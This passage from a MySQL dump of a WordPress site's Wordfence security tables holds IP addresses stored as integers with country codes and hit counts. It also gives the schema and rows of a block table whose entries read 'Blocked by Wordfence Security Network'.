(3059525007, 'CN', 1, 17304),
(783839564, 'SA', 1, 17312),
(1828828346, 'FR', 2, 17312),
(1539837019, 'UA', 2, 17311),
(3497110456, 'US', 1, 17311),
(3098024844, 'US', 1, 17292),
(1632276610, 'US', 1, 17292),
(1312794843, 'LT', 1, 17270),
(3393065050, 'ID', 1, 17270),
(3153760673, 'MX', 1, 17270),
(694994617, 'DZ', 1, 17265),
(1729883369, 'VN', 1, 17292),
(2655384544, 'US', 1, 17292),
(1728523225, 'VN', 1, 17292),
(3527006264, 'ID', 2, 17292),
(633031051, 'FR', 1, 17292),
(1915728785, 'TW', 1, 17271),
(3128278202, 'CO', 1, 17265),
(645225201, 'US', 1, 17267),
(1768690486, 'DZ', 1, 17265),
(3056763507, 'SG', 20, 17265),
(2696044391, 'MA', 1, 17265),
(837089132, 'TH', 1, 17280),
(1599408102, 'NL', 1, 17280),
(2057029096, 'TH', 1, 17280),
(850036190, 'US', 1, 17271),
(1010931693, 'JP', 1, 17271),
(1224503857, 'JM', 1, 17271),
(3157539414, 'SA', 1, 17271),
(692429882, 'EG', 1, 17271),
(1336437487, 'PT', 1, 17270),
(3107039609, 'ES', 1, 17302),
(872392488, 'GB', 1, 17301),
(3332038879, 'US', 1, 17301),
(1833429877, 'IT', 1, 17301),
(3497117403, 'US', 1, 17301),
(1732504330, '', 1, 17300),
(1876519548, 'JP', 1, 17270),
(792112870, 'CA', 1, 17270),
(1295372723, 'SE', 1, 17270),
(3590043246, 'FR', 1, 17299),
(843039290, 'US', 1, 17292),
(521678460, 'ES', 2, 17292),
(1605635691, 'RS', 1, 17273),
(2537443566, 'IT', 1, 17273),
(1768869012, 'DZ', 1, 17273),
(2982956000, 'BR', 1, 17273),
(778399303, 'GB', 1, 17300),
(608990115, 'ID', 1, 17272),
(3254738604, 'TR', 1, 17271),
(1834854232, 'RS', 1, 17271),
(3171175055, 'BR', 1, 17270),
(1534241720, 'AT', 1, 17270),
(1768890868, 'DZ', 1, 17270),
(704272349, 'MA', 1, 17269),
(3127732489, 'AR', 1, 17269),
(1502039210, 'HU', 1, 17269),
(2513075873, 'DE', 1, 17268),
(1564673684, 'IT', 1, 17268),
(2536603054, 'IT', 1, 17266),
(3149830434, 'MX', 1, 17280),
(1380764866, 'RO', 1, 17270),
(1731167281, 'ID', 1, 17269),
(3159373275, 'PT', 1, 17269),
(86607465, 'SA', 1, 17273),
(1958862038, 'BD', 1, 17272),
(3120978290, 'DO', 1, 17272),
(701685514, 'AO', 1, 17271),
(1144739235, 'US', 1, 17271),
(688738866, 'ZA', 1, 17269),
(2997180598, 'UA', 2, 17269),
(2954991853, 'TR', 1, 17268),
(3188441888, 'AR', 1, 17271),
(843754294, 'US', 1, 17270),
(3103997920, 'PL', 1, 17267),
(3001018728, 'RS', 1, 17266),
(1851610344, 'PH', 1, 17265),
(694229235, 'DZ', 1, 17280),
(2015196739, 'PH', 1, 17277),
(1050879178, 'NL', 1, 17277),
(3171175154, 'BR', 1, 17340),
(1239185676, 'US', 1, 17340),
(2630103348, '', 1, 17340),
(1113016646, 'US', 1, 17340),
(3682725338, 'CN', 4, 17340),
(1676138367, 'CA', 1, 17340),
(2867854843, '', 1, 17340),
(632957447, 'AT', 1, 17340),
(1309960562, 'BE', 1, 17340),
(3574948740, 'SE', 1, 17340),
(2534459701, 'IT', 1, 17340),
(3218485542, 'BR', 1, 17340),
(3682725338, 'CN', 5, 17341),
(3154283770, 'RS', 1, 17341),
(1549150117, 'RO', 1, 17341),
(2537022330, 'IT', 1, 17341),
(3185558189, 'MX', 1, 17341),
(2390016735, 'CA', 1, 17341),
(3682725338, 'CN', 7, 17342),
(1354011537, 'IT', 1, 17342),
(1581398262, 'GR', 1, 17342),
(830516292, 'IN', 1, 17342),
(1092327198, 'US', 1, 17342),
(1549067217, 'RO', 1, 17342),
(1530341882, 'DE', 1, 17342),
(1332972736, 'RO', 1, 17342),
(1504019374, 'RO', 1, 17342),
(3127517827, 'CL', 1, 17342),
(1127030815, 'US', 1, 17342),
(759219118, 'IN', 1, 17342),
(1484276859, 'FR', 1, 17342),
(1348626918, 'HU', 1, 17342),
(2042128290, 'KR', 1, 17343),
(3682725338, 'CN', 8, 17343),
(792045249, 'IT', 1, 17343),
(1327704679, 'IT', 1, 17343),
(3590217870, 'ES', 1, 17343),
(644873987, 'US', 1, 17343),
(2945444222, 'MY', 1, 17343),
(3708042678, 'CN', 1, 17344),
(3186141464, 'MX', 1, 17344),
(1768737787, 'DZ', 1, 17344),
(3682725338, 'CN', 3, 17344),
(2851037189, 'US', 1, 17344),
(3306065029, 'TN', 1, 17344),
(1048591873, 'IL', 1, 17344),
(1908305645, 'VN', 1, 17344),
(755475457, 'US', 1, 17345),
(3293189371, '', 1, 17345),
(3216151749, 'BR', 1, 17345),
(1539836950, 'UA', 1, 17345),
(84796080, 'RO', 1, 17345),
(973497450, 'AU', 1, 17345),
(1133404225, 'US', 1, 17345),
(2970975037, 'BR', 1, 17345),
(3185120017, 'MX', 1, 17345),
(3105930270, 'PT', 1, 17345),
(3135207294, 'BR', 1, 17346),
(1329042672, 'IT', 1, 17347),
(3315981465, 'EG', 1, 17347),
(1441124516, 'SE', 1, 17347),
(2963878449, 'FR', 1, 17348),
(2094473799, 'JP', 1, 17348),
(657088345, 'PK', 1, 17348),
(2898773830, 'AU', 1, 17348),
(1452261118, 'GB', 1, 17348),
(694234475, 'DZ', 1, 17348),
(1539836950, 'UA', 1, 17348),
(1317833414, 'NL', 1, 17348),
(778276980, 'AL', 1, 17348),
(3211865851, 'CL', 1, 17348),
(1443044267, 'GB', 1, 17348),
(3168301617, 'IT', 1, 17348),
(3731698192, 'KR', 1, 17349),
(1549936997, 'AE', 1, 17349),
(1777049476, 'MU', 1, 17349),
(1839458818, 'RO', 1, 17349),
(657922338, 'PK', 1, 17349),
(1235922150, 'US', 1, 17349),
(2875283979, 'TH', 1, 17349),
(1539836950, 'UA', 1, 17349),
(1391229745, 'FR', 1, 17349),
(3319952174, 'MU', 1, 17349),
(1363303233, 'FR', 1, 17349),
(3560722714, 'GM', 1, 17349),
(1435830550, 'NL', 1, 17350),
(3291887408, 'US', 1, 17350),
(1544811101, 'GB', 1, 17350),
(1570530821, 'ES', 1, 17350),
(1539836950, 'UA', 1, 17350),
(3497108325, 'US', 1, 17350),
(694199286, 'DZ', 1, 17350),
(694508115, 'DZ', 1, 17350),
(3033775030, 'BD', 1, 17350),
(1307411185, 'CZ', 1, 17350),
(3135066780, 'BR', 1, 17350),
(1800230200, 'US', 1, 17351),
(1040268236, 'GR', 1, 17351),
(1539836950, 'UA', 2, 17351),
(3561984809, 'ES', 1, 17351),
(3104980322, 'HR', 1, 17351),
(1807545404, 'US', 1, 17351),
(1768344095, 'DZ', 1, 17351),
(2955898566, 'SA', 1, 17351),
(1550636993, 'NL', 1, 17352),
(656512273, 'PK', 1, 17352),
(1539836950, 'UA', 1, 17352),
(996019409, 'IN', 1, 17352),
(771295430, '', 1, 17352),
(2970739670, 'BR', 1, 17352),
(2631915670, '', 1, 17352),
(1081048870, 'US', 1, 17352),
(1510259739, 'FR', 1, 17352),
(700942233, 'EG', 1, 17352),
(453419362, 'IN', 1, 17353),
(3032446933, 'PH', 1, 17353),
(2058401108, 'IN', 1, 17353),
(2745975732, 'GB', 1, 17353),
(3376883719, 'BR', 1, 17353),
(3133998086, 'BR', 1, 17354),
(1307971246, 'IT', 1, 17354),
(1829708752, 'FR', 1, 17354),
(3646079390, 'DE', 1, 17354),
(1539836950, 'UA', 1, 17354),
(2058258280, 'IN', 1, 17354),
(2961112076, 'RO', 1, 17354),
(1124218043, 'US', 1, 17355),
(84712992, 'RO', 1, 17355),
(887721709, 'US', 20, 17355),
(1776310817, 'ZA', 1, 17355),
(1610237772, 'IT', 1, 17356),
(2971068426, 'BR', 1, 17356),
(2979847696, 'BR', 1, 17356),
(16883149, 'TH', 1, 17356),
(837087165, 'TH', 1, 17356),
(3197645454, 'EC', 1, 17356),
(86730617, 'BA', 1, 17356),
(779420885, 'IL', 1, 17356),
(1539836950, 'UA', 1, 17356),
(1314156440, 'LV', 1, 17356),
(2830446697, '', 1, 17357),
(3032370800, 'PH', 1, 17357),
(2047078917, 'PH', 1, 17357),
(1743248074, 'IN', 1, 17357),
(1287217583, 'US', 1, 17357),
(1892904470, 'PH', 1, 17357),
(36889934, 'AE', 1, 17357),
(1539836950, 'UA', 2, 17357),
(1333864093, 'GR', 1, 17357),
(3526612805, 'CN', 1, 17357),
(1410847463, 'PT', 1, 17358),
(1321684459, 'FR', 1, 17358),
(1539836950, 'UA', 1, 17358),
(1326068261, 'IT', 1, 17358),
(792007333, 'IT', 1, 17358),
(3321488109, 'MZ', 1, 17359),
(1326228420, 'IT', 1, 17359),
(1471709157, 'DE', 1, 17359),
(2393026044, 'CA', 1, 17359),
(2152704098, 'FR', 1, 17359),
(42616701, 'ES', 1, 17359),
(1581302042, 'GR', 1, 17359),
(1539836950, 'UA', 2, 17360),
(1235952074, 'US', 1, 17360),
(915750734, 'US', 1, 17360),
(874674276, 'US', 1, 17360),
(3481717135, 'CA', 1, 17360),
(583622267, 'US', 1, 17360),
(3197462569, 'GT', 1, 17361),
(2927706329, 'US', 1, 17361),
(702461109, 'TZ', 1, 17361),
(920891349, 'US', 1, 17361),
(585452219, 'US', 1, 17361),
(3577295515, 'IL', 1, 17361),
(455217818, 'NP', 1, 17361),
(1337027635, 'IL', 1, 17361),
(634555953, 'QA', 1, 17361),
(404453904, 'US', 1, 17361),
(692377094, 'EG', 1, 17361),
(1376975531, 'GB', 1, 17361),
(3141400205, 'BR', 1, 17362),
(585330554, 'US', 1, 17362),
(1293927825, 'SA', 1, 17362),
(835573799, 'IN', 1, 17362),
(1976044991, 'IN', 1, 17362),
(1297608708, 'CZ', 1, 17362),
(1539836950, 'UA', 1, 17362),
(874893407, 'US', 2, 17362),
(585291184, 'US', 1, 17362),
(3319954936, 'MU', 1, 17362),
(1539836950, 'UA', 2, 17363),
(3042655538, 'AR', 1, 17363),
(3361094801, 'CL', 1, 17363),
(919161641, 'US', 1, 17363),
(1678835878, 'US', 1, 17363),
(1744517895, 'IN', 1, 17363),
(585452219, 'US', 1, 17363),
(584188065, 'US', 1, 17363),
(1887841908, 'LK', 1, 17364),
(1539836950, 'UA', 1, 17364),
(1539428482, 'PL', 1, 17364),
(874738092, 'US', 2, 17364),
(1729078788, 'BD', 1, 17364),
(3164695660, 'PS', 1, 17364),
(1855096721, 'AU', 1, 17365),
(1237999338, 'US', 1, 17365),
(598145435, 'US', 1, 17365),
(1422229100, 'BE', 1, 17365),
(598069797, 'US', 1, 17365),
(885815617, 'US', 1, 17365),
(3680266720, 'MY', 1, 17365),
(1324837478, 'FR', 1, 17365),
(911757147, 'US', 1, 17365),
(3410419836, 'TW', 1, 17365),
(3269181341, 'GR', 1, 17365),
(3120616689, 'AR', 1, 17366),
(3114828415, '', 1, 17366);

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfBlocks`
--

CREATE TABLE `www2_wfBlocks` (
  `IP` int(10) UNSIGNED NOT NULL,
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) UNSIGNED DEFAULT '0',
  `blockedHits` int(10) UNSIGNED DEFAULT '0',
  `wfsn` tinyint(3) UNSIGNED DEFAULT '0',
  `permanent` tinyint(3) UNSIGNED DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfBlocks`
--

INSERT INTO `www2_wfBlocks` (`IP`, `blockedTime`, `reason`, `lastAttempt`, `blockedHits`, `wfsn`, `permanent`) VALUES
(3164986572, 1496125250, 'Blocked by Wordfence Security Network', 1496125252, 2, 1, 0),
(1279978460, 1494174197, 'Blocked by Wordfence Security Network', 1494174199, 1, 1, 0),
(794439728, 1494596017, 'Blocked by Wordfence Security Network', 1494596019, 2, 1, 0),
(2202594575, 1494167955, 'Blocked by Wordfence Security Network', 1494168024, 1, 1, 0),
(3098029701, 1494186073, 'Blocked by Wordfence Security Network', 1494186096, 1, 1, 0),
(3056763559, 1494186058, 'Blocked by Wordfence Security Network', 1494186099, 4, 1, 0),
(1053997316, 1494167247, 'Blocked by Wordfence Security Network', 1494167375, 2, 1, 0),
(3098024781, 1494150065, 'Blocked by Wordfence Security Network', 1494150076, 1, 1, 0),
(2996829330, 1494169647, 'Blocked by Wordfence Security Network', 1494169764, 4, 1, 0),
(1743622318, 1494223472, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1893028934, 1494133399, 'Blocked by Wordfence Security Network', 1494133418, 1, 1, 0),
(2727364316, 1494184792, 'Blocked by Wordfence Security Network', 1494149433, 3, 1, 0),
(3098024846, 1494116197, 'Blocked by Wordfence Security Network', 1494116210, 2, 1, 0),
(3098029782, 1494116196, 'Blocked by Wordfence Security Network', 1494116224, 3, 1, 0),
(762746819, 1494224241, 'Blocked by Wordfence Security Network', 1494224400, 8, 1, 0),
(2111103174, 1494203699, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3237666864, 1494087976, 'Blocked by Wordfence Security Network', 1494087978, 1, 1, 0),
(1632276610, 1494084900, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3098024844, 1494084893, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1729883369, 1494084572, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2655384544, 1494084560, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1728523225, 1494084560, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3527006264, 1494204322, 'Blocked by Wordfence Security Network', 1494204426, 6, 1, 0),
(633031051, 1494134009, 'Blocked by Wordfence Security Network', 1494134260, 1, 1, 0),
(843039290, 1494084555, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(521678460, 1494223417, 'Blocked by Wordfence Security Network', 1494084584, 2, 1, 0),
(3423600883, 1494203507, 'Blocked by Wordfence Security Network', 1494203564, 3, 1, 0),
(2746000698, 1494203485, 'Blocked by Wordfence Security Network', 1494203690, 6, 1, 0),
(469651732, 1494072996, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2988470183, 1494100230, 'Blocked by Wordfence Security Network', 1494100340, 6, 1, 0),
(3164982411, 1494204457, 'Blocked by Wordfence Security Network', 1494084536, 2, 1, 0),
(3353828771, 1494084554, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1632245985, 1494060818, 'Blocked by Wordfence Security Network', 1494060838, 2, 1, 0),
(3346287710, 1494116335, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3069127338, 1494184828, 'Blocked by Wordfence Security Network', 1494184862, 2, 1, 0),
(1138881296, 1494167247, 'Blocked by Wordfence Security Network', 1494167509, 4, 1, 0),
(3191614634, 1494173321, 'Blocked by Wordfence Security Network', 1494173323, 2, 1, 0),
(637050808, 1493312452, 'Blocked by Wordfence Security Network', 1493312455, 4, 1, 0),
(28968311, 1493316187, 'Blocked by Wordfence Security Network', 1493316190, 4, 1, 0),
(621184356, 1493320110, 'Blocked by Wordfence Security Network', 1493320112, 4, 1, 0),
(3412761521, 1493340938, 'Blocked by Wordfence Security Network', 1493340942, 4, 1, 0),
(831636304, 1493351968, 'Blocked by Wordfence Security Network', 1493351973, 4, 1, 0),
(702768013, 1493352643, 'Blocked by Wordfence Security Network', 1493352646, 4, 1, 0),
(2873895206, 1493386238, 'Blocked by Wordfence Security Network', 1493386241, 4, 1, 0),
(2058018895, 1493404013, 'Blocked by Wordfence Security Network', 1493404015, 4, 1, 0),
(608761984, 1493410002, 'Blocked by Wordfence Security Network', 1493410039, 4, 1, 0),
(1549131029, 1493416810, 'Blocked by Wordfence Security Network', 1493416812, 4, 1, 0),
(3197714889, 1493425785, 'Blocked by Wordfence Security Network', 1493425789, 4, 1, 0),
(2979895540, 1493427777, 'Blocked by Wordfence Security Network', 1493427793, 4, 1, 0),
(3039577960, 1493433332, 'Blocked by Wordfence Security Network', 1493433335, 4, 1, 0),
(3304677463, 1493436060, 'Blocked by Wordfence Security Network', 1493436063, 4, 1, 0),
(1023584817, 1493439195, 'Blocked by Wordfence Security Network', 1493439198, 4, 1, 0),
(1430349643, 1493439696, 'Blocked by Wordfence Security Network', 1493439699, 4, 1, 0),
(1149515385, 1493440366, 'Blocked by Wordfence Security Network', 1493440368, 4, 1, 0),
(2917961944, 1493591700, 'Blocked by Wordfence Security Network', 1493591702, 1, 1, 0),
(3195004720, 1493671338, 'Blocked by Wordfence Security Network', 1493671343, 4, 1, 0),
(773229120, 1493702332, 'Blocked by Wordfence Security Network', 1493702334, 1, 1, 0),
(1571457074, 1493805430, 'Blocked by Wordfence Security Network', 1493805432, 1, 1, 0),
(794450239, 1493805944, 'Blocked by Wordfence Security Network', 1493805947, 1, 1, 0),
(3326600728, 1493806833, 'Blocked by Wordfence Security Network', 1493806835, 1, 1, 0),
(3644686526, 1493806977, 'Blocked by Wordfence Security Network', 1493806978, 1, 1, 0),
(3497113801, 1493945486, 'Blocked by Wordfence Security Network', 1493945487, 1, 1, 0),
(3497113622, 1495586186, 'Blocked by Wordfence Security Network', 1495586188, 5, 1, 0),
(3497110456, 1495688389, 'Blocked by Wordfence Security Network', 1495688391, 2, 1, 0),
(3590043250, 1494344413, 'Blocked by Wordfence Security Network', 1494344414, 2, 1, 0),
(3382964636, 1493310999, 'Blocked by Wordfence Security Network', 1493311003, 4, 1, 0),
(3157204740, 1493310765, 'Blocked by Wordfence Security Network', 1493310768, 4, 1, 0),
(1396104586, 1493305620, 'Blocked by Wordfence Security Network', 1493305622, 4, 1, 0),
(1317189474, 1493283580, 'Blocked by Wordfence Security Network', 1493283583, 4, 1, 0),
(1449745144, 1493296040, 'Blocked by Wordfence Security Network', 1493296043, 4, 1, 0),
(1887828803, 1493302076, 'Blocked by Wordfence Security Network', 1493302079, 4, 1, 0),
(2391196847, 1493269667, 'Blocked by Wordfence Security Network', 1493269670, 4, 1, 0),
(1892041857, 1493261050, 'Blocked by Wordfence Security Network', 1493261053, 4, 1, 0),
(3142072067, 1493256849, 'Blocked by Wordfence Security Network', 1493256852, 4, 1, 0),
(3159244987, 1493253264, 'Blocked by Wordfence Security Network', 1493253266, 4, 1, 0),
(86750727, 1493245537, 'Blocked by Wordfence Security Network', 1493245540, 4, 1, 0),
(1833643342, 1493233679, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2760119799, 1493230816, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835651188, 1493216472, 'Blocked by Wordfence Security Network', 1493216475, 4, 1, 0),
(702781337, 1493197801, 'Blocked by Wordfence Security Network', 1493197804, 4, 1, 0),
(832022104, 1493195192, 'Blocked by Wordfence Security Network', 1493195196, 4, 1, 0),
(3360841433, 1493176793, 'Blocked by Wordfence Security Network', 1493176797, 4, 1, 0),
(1590804861, 1493169152, 'Blocked by Wordfence Security Network', 1493169155, 4, 1, 0),
(1223522106, 1493168329, 'Blocked by Wordfence Security Network', 1493168332, 4, 1, 0),
(3182212288, 1493165930, 'Blocked by Wordfence Security Network', 1493165933, 4, 1, 0),
(1565928623, 1493163212, 'Blocked by Wordfence Security Network', 1493163215, 4, 1, 0),
(2957549377, 1493158682, 'Blocked by Wordfence Security Network', 1493158685, 4, 1, 0),
(3017071845, 1493152168, 'Blocked by Wordfence Security Network', 1493152171, 4, 1, 0),
(702589396, 1493141221, 'Blocked by Wordfence Security Network', 1493141224, 4, 1, 0),
(1589523921, 1493332454, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1293756220, 1493132339, 'Blocked by Wordfence Security Network', 1493132341, 4, 1, 0),
(2738198454, 1493104871, 'Blocked by Wordfence Security Network', 1493104875, 4, 1, 0),
(1401323221, 1493121788, 'Blocked by Wordfence Security Network', 1493121790, 4, 1, 0),
(1887842097, 1493123094, 'Blocked by Wordfence Security Network', 1493123097, 4, 1, 0),
(2943288819, 1493104704, 'Blocked by Wordfence Security Network', 1493104708, 4, 1, 0),
(702756256, 1493104435, 'Blocked by Wordfence Security Network', 1493104438, 4, 1, 0),
(1741772220, 1493098899, 'Blocked by Wordfence Security Network', 1493098903, 4, 1, 0),
(3754818252, 1493087945, 'Blocked by Wordfence Security Network', 1493087949, 4, 1, 0),
(2637388761, 1493087466, 'Blocked by Wordfence Security Network', 1493087469, 4, 1, 0),
(2399207350, 1493087412, 'Blocked by Wordfence Security Network', 1493087415, 4, 1, 0),
(2320235926, 1493085701, 'Blocked by Wordfence Security Network', 1493085704, 4, 1, 0),
(842254621, 1493079982, 'Blocked by Wordfence Security Network', 1493079985, 4, 1, 0),
(86724239, 1493075786, 'Blocked by Wordfence Security Network', 1493075788, 4, 1, 0),
(1473126706, 1493071787, 'Blocked by Wordfence Security Network', 1493071789, 4, 1, 0),
(1837181866, 1493068009, 'Blocked by Wordfence Security Network', 1493068011, 4, 1, 0),
(1242501469, 1493057105, 'Blocked by Wordfence Security Network', 1493057107, 4, 1, 0),
(1459691243, 1493057139, 'Blocked by Wordfence Security Network', 1493057142, 4, 1, 0),
(1484515861, 1493055055, 'Blocked by Wordfence Security Network', 1493055057, 4, 1, 0),
(1892753981, 1493053170, 'Blocked by Wordfence Security Network', 1493053174, 4, 1, 0),
(837089132, 1493036722, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1599408102, 1493026369, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2057029096, 1493015499, 'Blocked by Wordfence Security Network', 1493015504, 4, 1, 0),
(3149830434, 1493000029, 'Blocked by Wordfence Security Network', 1493000032, 4, 1, 0),
(694229235, 1492994207, 'Blocked by Wordfence Security Network', 1492994209, 4, 1, 0),
(1578617924, 1494224217, 'Blocked by Wordfence Security Network', 1494224374, 3, 1, 0),
(3098024843, 1494203540, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3059525007, 1495096161, 'Blocked by Wordfence Security Network', 1495096173, 8, 1, 0),
(736163900, 1494310133, 'Blocked by Wordfence Security Network', 1494310208, 83, 1, 0),
(1299175467, 1494345339, 'Blocked by Wordfence Security Network', 1494345341, 1, 1, 0),
(1743847615, 1494520585, 'Blocked by Wordfence Security Network', 1494520591, 1, 1, 0),
(2513063543, 1494521117, 'Blocked by Wordfence Security Network', 1494521118, 1, 1, 0),
(1570692602, 1494521597, 'Blocked by Wordfence Security Network', 1494521598, 1, 1, 0),
(2901752882, 1494522689, 'Blocked by Wordfence Security Network', 1494522691, 1, 1, 0),
(1572433768, 1494678340, 'Blocked by Wordfence Security Network', 1494678341, 2, 1, 0),
(3116589525, 1494596451, 'Blocked by Wordfence Security Network', 1494596452, 1, 1, 0),
(1119841390, 1495360892, 'Blocked by Wordfence Security Network', 1495360894, 2, 1, 0),
(1728585030, 1494603905, 'Blocked by Wordfence Security Network', 1494603907, 1, 1, 0),
(1168365674, 1494678892, 'Blocked by Wordfence Security Network', 1494678894, 1, 1, 0),
(3590043246, 1494684435, 'Blocked by Wordfence Security Network', 1494684436, 1, 1, 0),
(1427222478, 1494750687, 'Blocked by Wordfence Security Network', 1494750688, 1, 1, 0),
(778399303, 1494751507, 'Blocked by Wordfence Security Network', 1494751508, 1, 1, 0),
(1732504330, 1495585685, 'Blocked by Wordfence Security Network', 1495585688, 2, 1, 0),
(3497117403, 1494829488, 'Blocked by Wordfence Security Network', 1494829490, 1, 1, 0),
(1833429877, 1494839680, 'Blocked by Wordfence Security Network', 1494839683, 4, 1, 0),
(3332038879, 1494856727, 'Blocked by Wordfence Security Network', 1494856747, 4, 1, 0),
(872392488, 1494885335, 'Blocked by Wordfence Security Network', 1494885337, 4, 1, 0),
(3107039609, 1495776658, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1539837019, 1497919538, 'Blocked by Wordfence Security Network', 1495748307, 2, 1, 0),
(1434732386, 1495186790, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1168360410, 1495363943, 'Blocked by Wordfence Security Network', 1495363945, 2, 1, 0),
(1053969232, 1495259647, 'Blocked by Wordfence Security Network', 1495259671, 1, 1, 0),
(1079652533, 1495260232, 'Blocked by Wordfence Security Network', 1495260234, 1, 1, 0),
(3056768804, 1495271338, 'Blocked by Wordfence Security Network', 1495271423, 1, 1, 0),
(1586073137, 1495340881, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(598138358, 1495361453, 'Blocked by Wordfence Security Network', 1495361454, 1, 1, 0),
(3497114222, 1495361935, 'Blocked by Wordfence Security Network', 1495361936, 1, 1, 0),
(3105930270, 1498690202, 'Blocked by Wordfence Security Network', 1498690204, 2, 1, 0),
(3476728705, 1495362457, 'Blocked by Wordfence Security Network', 1495362459, 1, 1, 0),
(3280140082, 1495362812, 'Blocked by Wordfence Security Network', 1495362819, 1, 1, 0),
(3586257058, 1496014267, 'Blocked by Wordfence Security Network', 1496014268, 2, 1, 0),
(1741512757, 1496463021, 'Blocked by Wordfence Security Network', 1496463023, 2, 1, 0),
(1833311020, 1495470988, 'Blocked by Wordfence Security Network', 1495470990, 1, 1, 0),
(3237921028, 1495471953, 'Blocked by Wordfence Security Network', 1495471955, 1, 1, 0),
(1729627112, 1495911578, 'Blocked by Wordfence Security Network', 1495911580, 2, 1, 0),
(1495980045, 1495473240, 'Blocked by Wordfence Security Network', 1495473242, 1, 1, 0),
(3163163411, 1496709296, 'Blocked by Wordfence Security Network', 1496709298, 3, 1, 0),
(842965149, 1495583194, 'Blocked by Wordfence Security Network', 1495583198, 1, 1, 0),
(3635199372, 1495583530, 'Blocked by Wordfence Security Network', 1495583532, 1, 1, 0),
(842969123, 1495584571, 'Blocked by Wordfence Security Network', 1495584573, 1, 1, 0),
(3590043248, 1495586644, 'Blocked by Wordfence Security Network', 1495586645, 1, 1, 0),
(3242600154, 1495587211, 'Blocked by Wordfence Security Network', 1495587212, 1, 1, 0),
(1760853483, 1495687824, 'Blocked by Wordfence Security Network', 1495687827, 1, 1, 0),
(1828828346, 1495970055, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(783839564, 1495771606, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658598, 1495951743, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1401863434, 1495784050, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1042038966, 1495852932, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3170385964, 1495863878, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3735412901, 1495795232, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1845364905, 1495806054, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3489067105, 1496649439, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835212082, 1495808120, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1941604657, 1495812262, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1828725649, 1495814331, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3387838170, 1495914378, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(781668949, 1495985527, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1495116718, 1495825048, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2030594922, 1495827571, 'Blocked by Wordfence Security Network', 1495827576, 2, 1, 0),
(1563679021, 1495949720, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2949647692, 1495892193, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1046956164, 1495833372, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3397466494, 1495971977, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1534992972, 1495837555, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(783835753, 1495839704, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1828725654, 1495841872, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835212154, 1495859479, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1539836981, 1495884375, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2156323210, 1495900481, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835212158, 1495882369, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3107039490, 1495896342, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(529855267, 1495902427, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658391, 1495904455, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(2548839223, 1495910237, 'Blocked by Wordfence Security Network', 1495910239, 2, 1, 0),
(3555103830, 1495910916, 'Blocked by Wordfence Security Network', 1495910919, 1, 1, 0),
(3168080791, 1495911249, 'Blocked by Wordfence Security Network', 1495911252, 1, 1, 0),
(3151105913, 1495912251, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658403, 1495918391, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3152885982, 1495924494, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(529853472, 1495928647, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658399, 1495930829, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3415089988, 1495932996, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3362989667, 1495935070, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3415091724, 1495937167, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3001689384, 1495941420, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(3254658395, 1495957823, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(1835211794, 1495961949, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
(48857242, 1495966069, 'Blocked by Wordfence Security Network', 0, 0, 1, 0),
